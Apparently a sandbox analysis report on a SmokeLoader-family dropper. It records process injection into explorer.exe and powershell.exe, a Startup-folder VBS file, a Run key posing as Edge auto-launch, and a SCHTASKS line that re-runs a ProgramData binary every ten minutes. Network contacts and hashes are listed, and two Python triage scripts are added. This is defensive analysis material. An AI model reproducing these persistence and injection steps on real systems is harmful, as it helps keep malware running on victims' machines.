memory/5868-535-0x00007FFCE4B20000-0x00007FFCE55E1000-memory.dmp

Analysis: behavioral20

Detonation Overview

Submitted

2025-05-04 05:10

Reported

2025-05-04 05:15

Platform

win10v2004-20250502-en

Max time kernel

150s

Max time network

154s

Command Line

"C:\Users\Admin\AppData\Local\Temp\HYDRA.exe"

Signatures

SmokeLoader

trojan backdoor smokeloader

Smokeloader family

smokeloader

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-3299287909-2279959458-198972791-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Roaming\ufx.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3299287909-2279959458-198972791-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Roaming\yaya.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3299287909-2279959458-198972791-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Roaming\power.exe N/A

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HDAudo.vbs C:\Users\Admin\AppData\Roaming\va.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-3299287909-2279959458-198972791-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\MicrosoftEdgeAutoLaunch_5EFC0ECB77A7585FE9DCDD0B2E946A2B = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\ersatbtf\\jsbsgjba.exe" C:\Windows\SysWOW64\explorer.exe N/A

Maps connected drives based on registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum C:\Users\Admin\AppData\Roaming\sant.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0 C:\Users\Admin\AppData\Roaming\sant.exe N/A

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\HYDRA.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\va.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\ufx.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\power.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\yaya.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\sant.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\ProgramData\ucp\usc.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\SCHTASKS.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\SCHTASKS.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\sant.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\sant.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\sant.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\sant.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\sant.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\sant.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\sant.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\sant.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\sant.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\sant.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\sant.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\sant.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\sant.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\sant.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\sant.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\sant.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\sant.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\sant.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\sant.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\sant.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\sant.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\sant.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\sant.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\sant.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\sant.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\sant.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\sant.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\sant.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\sant.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\sant.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\sant.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\sant.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\sant.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\sant.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\sant.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\sant.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\sant.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\sant.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\sant.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\sant.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\sant.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\sant.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\sant.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\sant.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\sant.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\sant.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\sant.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\sant.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\sant.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\sant.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\sant.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\sant.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\sant.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\sant.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\sant.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\sant.exe N/A
N/A N/A C:\Windows\Temp\{1945BBS40-8571-3DA1-BB29-HYDRA7A13A1E}\starter.exe N/A
N/A N/A C:\Windows\Temp\{1945BBS40-8571-3DA1-BB29-HYDRA7A13A1E}\starter.exe N/A
N/A N/A C:\Windows\Temp\{1945BBS40-8571-3DA1-BB29-HYDRA7A13A1E}\starter.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\sant.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\sant.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\sant.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\sant.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\sant.exe N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\sant.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\sant.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\ProgramData\ucp\usc.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\Temp\{1945BBS40-8571-3DA1-BB29-HYDRA7A13A1E}\starter.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 5644 wrote to memory of 1092 N/A C:\Users\Admin\AppData\Local\Temp\HYDRA.exe C:\Users\Admin\AppData\Roaming\yaya.exe
PID 5644 wrote to memory of 1092 N/A C:\Users\Admin\AppData\Local\Temp\HYDRA.exe C:\Users\Admin\AppData\Roaming\yaya.exe
PID 5644 wrote to memory of 1092 N/A C:\Users\Admin\AppData\Local\Temp\HYDRA.exe C:\Users\Admin\AppData\Roaming\yaya.exe
PID 5644 wrote to memory of 5336 N/A C:\Users\Admin\AppData\Local\Temp\HYDRA.exe C:\Users\Admin\AppData\Roaming\va.exe
PID 5644 wrote to memory of 5336 N/A C:\Users\Admin\AppData\Local\Temp\HYDRA.exe C:\Users\Admin\AppData\Roaming\va.exe
PID 5644 wrote to memory of 5336 N/A C:\Users\Admin\AppData\Local\Temp\HYDRA.exe C:\Users\Admin\AppData\Roaming\va.exe
PID 5644 wrote to memory of 5528 N/A C:\Users\Admin\AppData\Local\Temp\HYDRA.exe C:\Users\Admin\AppData\Roaming\ufx.exe
PID 5644 wrote to memory of 5528 N/A C:\Users\Admin\AppData\Local\Temp\HYDRA.exe C:\Users\Admin\AppData\Roaming\ufx.exe
PID 5644 wrote to memory of 5528 N/A C:\Users\Admin\AppData\Local\Temp\HYDRA.exe C:\Users\Admin\AppData\Roaming\ufx.exe
PID 5644 wrote to memory of 224 N/A C:\Users\Admin\AppData\Local\Temp\HYDRA.exe C:\Users\Admin\AppData\Roaming\sant.exe
PID 5644 wrote to memory of 224 N/A C:\Users\Admin\AppData\Local\Temp\HYDRA.exe C:\Users\Admin\AppData\Roaming\sant.exe
PID 5644 wrote to memory of 224 N/A C:\Users\Admin\AppData\Local\Temp\HYDRA.exe C:\Users\Admin\AppData\Roaming\sant.exe
PID 5644 wrote to memory of 4492 N/A C:\Users\Admin\AppData\Local\Temp\HYDRA.exe C:\Users\Admin\AppData\Roaming\power.exe
PID 5644 wrote to memory of 4492 N/A C:\Users\Admin\AppData\Local\Temp\HYDRA.exe C:\Users\Admin\AppData\Roaming\power.exe
PID 5644 wrote to memory of 4492 N/A C:\Users\Admin\AppData\Local\Temp\HYDRA.exe C:\Users\Admin\AppData\Roaming\power.exe
PID 1092 wrote to memory of 760 N/A C:\Users\Admin\AppData\Roaming\yaya.exe C:\Windows\Temp\{1945BBS40-8571-3DA1-BB29-HYDRA7A13A1E}\starter.exe
PID 1092 wrote to memory of 760 N/A C:\Users\Admin\AppData\Roaming\yaya.exe C:\Windows\Temp\{1945BBS40-8571-3DA1-BB29-HYDRA7A13A1E}\starter.exe
PID 5528 wrote to memory of 5888 N/A C:\Users\Admin\AppData\Roaming\ufx.exe C:\ProgramData\ucp\usc.exe
PID 5528 wrote to memory of 5888 N/A C:\Users\Admin\AppData\Roaming\ufx.exe C:\ProgramData\ucp\usc.exe
PID 5528 wrote to memory of 5888 N/A C:\Users\Admin\AppData\Roaming\ufx.exe C:\ProgramData\ucp\usc.exe
PID 5888 wrote to memory of 4672 N/A C:\ProgramData\ucp\usc.exe C:\Windows\SysWOW64\SCHTASKS.exe
PID 5888 wrote to memory of 4672 N/A C:\ProgramData\ucp\usc.exe C:\Windows\SysWOW64\SCHTASKS.exe
PID 5888 wrote to memory of 4672 N/A C:\ProgramData\ucp\usc.exe C:\Windows\SysWOW64\SCHTASKS.exe
PID 760 wrote to memory of 684 N/A C:\Windows\Temp\{1945BBS40-8571-3DA1-BB29-HYDRA7A13A1E}\starter.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe
PID 760 wrote to memory of 684 N/A C:\Windows\Temp\{1945BBS40-8571-3DA1-BB29-HYDRA7A13A1E}\starter.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe
PID 684 wrote to memory of 5348 N/A C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
PID 684 wrote to memory of 5348 N/A C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
PID 224 wrote to memory of 728 N/A C:\Users\Admin\AppData\Roaming\sant.exe C:\Windows\SysWOW64\explorer.exe
PID 224 wrote to memory of 728 N/A C:\Users\Admin\AppData\Roaming\sant.exe C:\Windows\SysWOW64\explorer.exe
PID 224 wrote to memory of 728 N/A C:\Users\Admin\AppData\Roaming\sant.exe C:\Windows\SysWOW64\explorer.exe
PID 4492 wrote to memory of 4932 N/A C:\Users\Admin\AppData\Roaming\power.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4492 wrote to memory of 4932 N/A C:\Users\Admin\AppData\Roaming\power.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4492 wrote to memory of 4932 N/A C:\Users\Admin\AppData\Roaming\power.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
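The WriteProcessMemory rows above are the raw material for the infection chain, but the sandbox emits one row per call, so the same parent/child pair appears two or three times and the chain has to be read across rows: HYDRA.exe writes into five droppers it launched, yaya.exe hands off to starter.exe under a Windows\Temp directory whose name only resembles a GUID (it contains "HYDRA"), starter.exe drives csc.exe and cvtres.exe (the normal .NET compile chain, matching the hqsi_zti.cmdline, .cs and .dll files in the Files list), sant.exe writes into explorer.exe, ufx.exe into usc.exe which then calls SCHTASKS, and power.exe into powershell.exe. The block below is an added example, not part of the report: it parses rows in the report's format (copied into a constructed string), collapses repeats into unique edges, and rebuilds the tree so the hand-offs read as one structure. The set of system binaries it marks as trusted hosts is an assumption.

```python
import re
from collections import defaultdict

# Rows copied from the WriteProcessMemory table above into a constructed input string;
# the sandbox emits one row per call, hence the repeats.
SAMPLE_ROWS = r"""
PID 5644 wrote to memory of 1092 N/A C:\Users\Admin\AppData\Local\Temp\HYDRA.exe C:\Users\Admin\AppData\Roaming\yaya.exe
PID 5644 wrote to memory of 1092 N/A C:\Users\Admin\AppData\Local\Temp\HYDRA.exe C:\Users\Admin\AppData\Roaming\yaya.exe
PID 5644 wrote to memory of 5336 N/A C:\Users\Admin\AppData\Local\Temp\HYDRA.exe C:\Users\Admin\AppData\Roaming\va.exe
PID 5644 wrote to memory of 5528 N/A C:\Users\Admin\AppData\Local\Temp\HYDRA.exe C:\Users\Admin\AppData\Roaming\ufx.exe
PID 5644 wrote to memory of 224 N/A C:\Users\Admin\AppData\Local\Temp\HYDRA.exe C:\Users\Admin\AppData\Roaming\sant.exe
PID 5644 wrote to memory of 4492 N/A C:\Users\Admin\AppData\Local\Temp\HYDRA.exe C:\Users\Admin\AppData\Roaming\power.exe
PID 1092 wrote to memory of 760 N/A C:\Users\Admin\AppData\Roaming\yaya.exe C:\Windows\Temp\{1945BBS40-8571-3DA1-BB29-HYDRA7A13A1E}\starter.exe
PID 5528 wrote to memory of 5888 N/A C:\Users\Admin\AppData\Roaming\ufx.exe C:\ProgramData\ucp\usc.exe
PID 5528 wrote to memory of 5888 N/A C:\Users\Admin\AppData\Roaming\ufx.exe C:\ProgramData\ucp\usc.exe
PID 5888 wrote to memory of 4672 N/A C:\ProgramData\ucp\usc.exe C:\Windows\SysWOW64\SCHTASKS.exe
PID 760 wrote to memory of 684 N/A C:\Windows\Temp\{1945BBS40-8571-3DA1-BB29-HYDRA7A13A1E}\starter.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe
PID 684 wrote to memory of 5348 N/A C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
PID 224 wrote to memory of 728 N/A C:\Users\Admin\AppData\Roaming\sant.exe C:\Windows\SysWOW64\explorer.exe
PID 224 wrote to memory of 728 N/A C:\Users\Admin\AppData\Roaming\sant.exe C:\Windows\SysWOW64\explorer.exe
PID 4492 wrote to memory of 4932 N/A C:\Users\Admin\AppData\Roaming\power.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"""

# "PID <ppid> wrote to memory of <pid> <indicator> <parent path> <child path>"; the
# recorded paths contain no spaces, so \S+ is enough here.
ROW_RE = re.compile(
    r"^PID\s+(?P<ppid>\d+)\s+wrote to memory of\s+(?P<pid>\d+)\s+\S+\s+"
    r"(?P<parent>[A-Za-z]:\\\S+)\s+(?P<child>[A-Za-z]:\\\S+)$"
)

# Signed Windows binaries a dropper writes into for process hollowing or to run its
# code under a trusted name; the set is an assumption for this example.
TRUSTED_HOSTS = {"explorer.exe", "powershell.exe", "schtasks.exe", "csc.exe", "cvtres.exe", "cmd.exe"}


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def parse_rows(text):
    """Collapse repeated rows into one edge per (parent PID, child PID)."""
    edges = {}
    for line in text.splitlines():
        m = ROW_RE.match(line.strip())
        if m:
            edges.setdefault((int(m["ppid"]), int(m["pid"])), (m["parent"], m["child"]))
    return edges


def build_tree(edges):
    """Return (roots, children, names): adjacency by PID plus each PID's image path."""
    children, names = defaultdict(list), {}
    for (ppid, pid), (pimg, cimg) in edges.items():
        children[ppid].append(pid)
        names.setdefault(ppid, pimg)
        names[pid] = cimg
    written_to = {pid for kids in children.values() for pid in kids}
    roots = sorted(p for p in children if p not in written_to)
    return roots, dict(children), names


def chains(text):
    """Every root-to-leaf path as a list of image basenames."""
    roots, children, names = build_tree(parse_rows(text))
    out = []

    def walk(pid, path):
        path = path + [basename(names[pid])]
        kids = sorted(children.get(pid, []))
        if not kids:
            out.append(path)
        for kid in kids:
            walk(kid, path)

    for root in roots:
        walk(root, [])
    return out


def render(text):
    """Indented tree, marking writes into trusted system binaries."""
    roots, children, names = build_tree(parse_rows(text))
    lines = []

    def walk(pid, depth):
        mark = "  <-- trusted host written to" if basename(names[pid]) in TRUSTED_HOSTS else ""
        lines.append(f"{'    ' * depth}{pid} {basename(names[pid])}{mark}")
        for kid in sorted(children.get(pid, [])):
            walk(kid, depth + 1)

    for root in roots:
        walk(root, 0)
    return lines


if __name__ == "__main__":
    print("\n".join(render(SAMPLE_ROWS)))
```

A root is any PID that writes into others but is never written into itself; here that is only HYDRA.exe, which confirms it as the initial dropper rather than a stage launched by something else. Writes into csc.exe and cvtres.exe by starter.exe are expected for a .NET process compiling code at runtime and are only interesting because the compiler is being driven from Windows\Temp; the writes into explorer.exe and powershell.exe are the ones to pull memory for.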

Processes

C:\Users\Admin\AppData\Local\Temp\HYDRA.exe

"C:\Users\Admin\AppData\Local\Temp\HYDRA.exe"

C:\Users\Admin\AppData\Roaming\yaya.exe

C:\Users\Admin\AppData\Roaming\yaya.exe

C:\Users\Admin\AppData\Roaming\va.exe

C:\Users\Admin\AppData\Roaming\va.exe

C:\Users\Admin\AppData\Roaming\ufx.exe

C:\Users\Admin\AppData\Roaming\ufx.exe

C:\Users\Admin\AppData\Roaming\sant.exe

C:\Users\Admin\AppData\Roaming\sant.exe

C:\Users\Admin\AppData\Roaming\power.exe

C:\Users\Admin\AppData\Roaming\power.exe

C:\Windows\Temp\{1945BBS40-8571-3DA1-BB29-HYDRA7A13A1E}\starter.exe

"C:\Windows\Temp\{1945BBS40-8571-3DA1-BB29-HYDRA7A13A1E}\starter.exe"

C:\ProgramData\ucp\usc.exe

"C:\ProgramData\ucp\usc.exe" /ucp/usc.exe

C:\Windows\SysWOW64\SCHTASKS.exe

SCHTASKS /Create /SC MINUTE /MO 10 /F /TN SystemOptimize /TR C:\ProgramData\ucp\usc.exe

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\hqsi_zti.cmdline"

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESA7CA.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCA7B9.tmp"

C:\Windows\SysWOW64\explorer.exe

explorer.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Microsoft\ersatbtf\jsbsgjba.exe

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
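Three persistence mechanisms appear in this detonation: va.exe drops HDAudo.vbs into the user's Startup folder, an explorer.exe that sant.exe wrote into sets a Run value whose name copies the MicrosoftEdgeAutoLaunch_<hash> convention Edge itself uses for its startup entry but points it at a random-looking directory under AppData\Roaming\Microsoft, and usc.exe registers a scheduled task named SystemOptimize that re-runs C:\ProgramData\ucp\usc.exe every 10 minutes with /F so it overwrites any task of that name. The block below is an added example, not part of the sandbox report: it parses the SCHTASKS command line and the Run-key indicator in the form the report prints them (constructed here from the tables above) and scores them on the traits that decide triage, namely a target in a user-writable directory, a short repeat interval, forced overwrite, a deceptive name, and a writer process that is a common injection host. The scoring weights and word lists are assumptions.

```python
import re

# Indicators constructed from the behavioral20 signature tables and process list
# above; this is not live task-scheduler or registry data.
SCHTASKS_CMD = r"SCHTASKS /Create /SC MINUTE /MO 10 /F /TN SystemOptimize /TR C:\ProgramData\ucp\usc.exe"
RUN_KEY_INDICATOR = (
    r"Set value (str) \REGISTRY\USER\S-1-5-21-3299287909-2279959458-198972791-1000"
    r"\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\MicrosoftEdgeAutoLaunch_5EFC0ECB77A7585FE9DCDD0B2E946A2B"
    r' = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\ersatbtf\\jsbsgjba.exe"'
)
RUN_KEY_WRITER = r"C:\Windows\SysWOW64\explorer.exe"

# SCHTASKS switches that take no argument; every other /XX consumes the next token.
NO_ARG_SWITCHES = {"/create", "/delete", "/query", "/run", "/end", "/change", "/f", "/z", "/v"}
UNIT_MINUTES = {"minute": 1, "hourly": 60, "daily": 1440}
USER_WRITABLE_MARKERS = ("c:\\programdata\\", "\\appdata\\", "c:\\users\\", "\\windows\\temp\\", "c:\\temp\\")
SYSTEM_ROOTS = ("c:\\windows\\", "c:\\program files\\", "c:\\program files (x86)\\")
LOOKALIKE_WORDS = ("system", "microsoft", "windows", "edge", "update", "security")
INJECTION_HOSTS = {"explorer.exe", "svchost.exe", "rundll32.exe", "dllhost.exe"}
# Registry value name after ...\CurrentVersion\Run\ and the quoted data, as the report prints it.
RUN_RE = re.compile(r'\\CurrentVersion\\Run\\(?P<name>\S+)\s*=\s*"(?P<value>.*)"\s*$')


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def in_user_writable(path):
    return any(m in path.lower() for m in USER_WRITABLE_MARKERS)


def under_system_root(path):
    return path.lower().startswith(SYSTEM_ROOTS)


def parse_schtasks(cmdline):
    """Tokenise a SCHTASKS command line into {switch: value_or_True}.
    Handles the unquoted form recorded above; a /TR containing spaces would be quoted."""
    tokens = cmdline.split()
    opts, i = {}, 1                      # token 0 is the image name
    while i < len(tokens):
        low = tokens[i].lower()
        if not low.startswith("/"):
            i += 1
            continue
        takes_arg = low not in NO_ARG_SWITCHES and i + 1 < len(tokens) and not tokens[i + 1].startswith("/")
        opts[low] = tokens[i + 1] if takes_arg else True
        i += 2 if takes_arg else 1
    return opts


def interval_minutes(opts):
    """Repeat interval implied by /SC and /MO, or None for schedules this example does not model."""
    unit = str(opts.get("/sc", "")).lower()
    mod = str(opts.get("/mo", "1"))
    if unit not in UNIT_MINUTES or not mod.isdigit():
        return None
    return UNIT_MINUTES[unit] * int(mod)


def triage_schtasks(cmdline):
    opts = parse_schtasks(cmdline)
    target = str(opts.get("/tr", ""))
    name = str(opts.get("/tn", ""))
    interval = interval_minutes(opts)
    reasons, score = [], 0
    if in_user_writable(target):
        reasons.append("task runs a binary from a user-writable directory")
        score += 2
    if interval is not None and interval <= 15:
        reasons.append(f"re-runs every {interval} min (watchdog-style persistence)")
        score += 2
    if opts.get("/f") is True:
        reasons.append("/F silently replaces any existing task with this name")
        score += 1
    if any(w in name.lower() for w in LOOKALIKE_WORDS) and not under_system_root(target):
        reasons.append("system-sounding task name for a non-system binary")
        score += 1
    return {"task_name": name, "target": target, "interval_minutes": interval, "score": score, "reasons": reasons}


def triage_run_key(indicator, writer=""):
    m = RUN_RE.search(indicator)
    if not m:
        return None
    name, target = m["name"], m["value"].replace("\\\\", "\\")   # undo the doubled backslashes
    reasons, score = [], 0
    if in_user_writable(target):
        reasons.append("autorun target in a user-writable directory")
        score += 2
    if name.lower().startswith("microsoftedgeautolaunch_") and basename(target) != "msedge.exe":
        reasons.append("borrows Edge's auto-launch value name but does not start msedge.exe")
        score += 2
    if writer and basename(writer) in INJECTION_HOSTS:
        reasons.append(f"value written by {basename(writer)}, a common injection host")
        score += 1
    return {"value_name": name, "target": target, "score": score, "reasons": reasons}


if __name__ == "__main__":
    print(triage_schtasks(SCHTASKS_CMD))
    print(triage_run_key(RUN_KEY_INDICATOR, writer=RUN_KEY_WRITER))
```

The Run-key check keys on the writer as well as the value: explorer.exe legitimately owns many shell settings, but a Run entry pointing at AppData\Roaming written from explorer.exe, after a dropper wrote into that explorer.exe, is the injected host doing the work. For the scheduled task, /SC MINUTE /MO 10 is the tell; benign software rarely needs a ten-minute watchdog for a binary living in ProgramData.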

Network

Country Destination Domain Proto
US 8.8.8.8:53 psix.tk udp
US 8.8.8.8:53 minercoinbox.com udp
GB 95.101.143.201:80 www.bing.com tcp
US 8.8.8.8:53 java.com udp
GB 95.101.143.183:443 java.com tcp
US 8.8.8.8:53 visualstudio.microsoft.com udp
GB 23.214.136.41:443 visualstudio.microsoft.com tcp
RU 92.53.105.14:80 tcp
US 8.8.8.8:53 c.pki.goog udp
DE 142.250.184.195:80 c.pki.goog tcp
US 8.8.8.8:53 www.microsoft.com udp
GB 95.100.245.144:443 www.microsoft.com tcp
US 8.8.8.8:53 www.visualstudio.com udp
GB 23.49.172.241:443 www.visualstudio.com tcp
US 8.8.8.8:53 www.videolan.org udp
FR 213.36.253.2:443 www.videolan.org tcp
US 8.8.8.8:53 www.mozilla.org udp
US 151.101.131.19:443 www.mozilla.org tcp
US 8.8.8.8:53 java.com udp
GB 95.101.143.183:443 java.com tcp
RU 92.53.105.14:80 tcp
US 8.8.8.8:53 java.com udp
GB 95.101.143.183:443 java.com tcp
US 8.8.8.8:53 www.microsoft.com udp
GB 95.100.245.144:443 www.microsoft.com tcp
US 8.8.8.8:53 www.visualstudio.com udp
GB 23.49.172.241:443 www.visualstudio.com tcp
GB 95.101.143.183:443 java.com tcp
GB 95.101.143.183:443 java.com tcp

Files

C:\Users\Admin\AppData\Roaming\yaya.exe

MD5 7d05ab95cfe93d84bc5db006c789a47f
SHA1 aa4aa0189140670c618348f1baad877b8eca04a4
SHA256 5c32e0d2a69fd77e85f2eecaabeb677b6f816de0d82bf7c29c9d124a818f424f
SHA512 40d1461e68994df56f19d9f7b2d96ffdc5300ca933e10dc53f7953471df8dea3aabeb178c3432c6819175475cadcbdb698384e3df57b3606c6fce3173a31fe84

C:\Users\Admin\AppData\Roaming\va.exe

MD5 c084e736931c9e6656362b0ba971a628
SHA1 ef83b95fc645ad3a161a19ccef3224c72e5472bd
SHA256 3139bf3c4b958c3a019af512aecdb8161b9d6d7432d2c404abda3f42b63f34f1
SHA512 cbd6485840a117b52e24586da536cefa94ca087b41eb460d27bc2bd320217957c9e0e96b0daf74343efde2e23a5242e7a99075aabf5f9e18e03b52eb7151ae1f

memory/5336-13-0x0000000000400000-0x000000000041C000-memory.dmp

memory/224-19-0x0000000000400000-0x0000000000404000-memory.dmp

C:\Users\Admin\AppData\Roaming\ufx.exe

MD5 22e088012519e1013c39a3828bda7498
SHA1 3a8a87cce3f6aff415ee39cf21738663c0610016
SHA256 9e3826138bacac89845c26278f52854117db1652174c1c76dbb2bd24f00f4973
SHA512 5559e279dd3d72b2c9062d88e99212bbc67639fe5a42076efd24ae890cfce72cfe2235adb20bf5ed1f547b6da9e69effa4ccb80c0407b7524f134a24603ea5a8

C:\Users\Admin\AppData\Roaming\sant.exe

MD5 5effca91c3f1e9c87d364460097f8048
SHA1 28387c043ab6857aaa51865346046cf5dc4c7b49
SHA256 3fd826fc0c032721466b94ab3ec7dcfe006cc284e16132af6b91dfbc064b0907
SHA512 b0dba30fde295d3f7858db9d1463239b30cd84921971032b2afb96f811a53ac12c1e6f72013d2eff397b0b89c371e7c023c951cd2102f94157cba9918cd2c3e0

memory/224-20-0x0000000000110000-0x000000000011A000-memory.dmp

C:\Users\Admin\AppData\Roaming\power.exe

MD5 743f47ae7d09fce22d0a7c724461f7e3
SHA1 8e98dd1efb70749af72c57344aab409fb927394e
SHA256 1bee45423044b5a6bf0ad0dd2870117824b000784ce81c5f8a1b930bb8bc0465
SHA512 567993c3b798365efa07b7a46fda98494bfe540647f27654764e78b7f60f093d403b77b9abb889cfb09b44f13515ce3c041fc5db05882418313c3b3409dd77bf

memory/224-24-0x0000000000110000-0x000000000011A000-memory.dmp

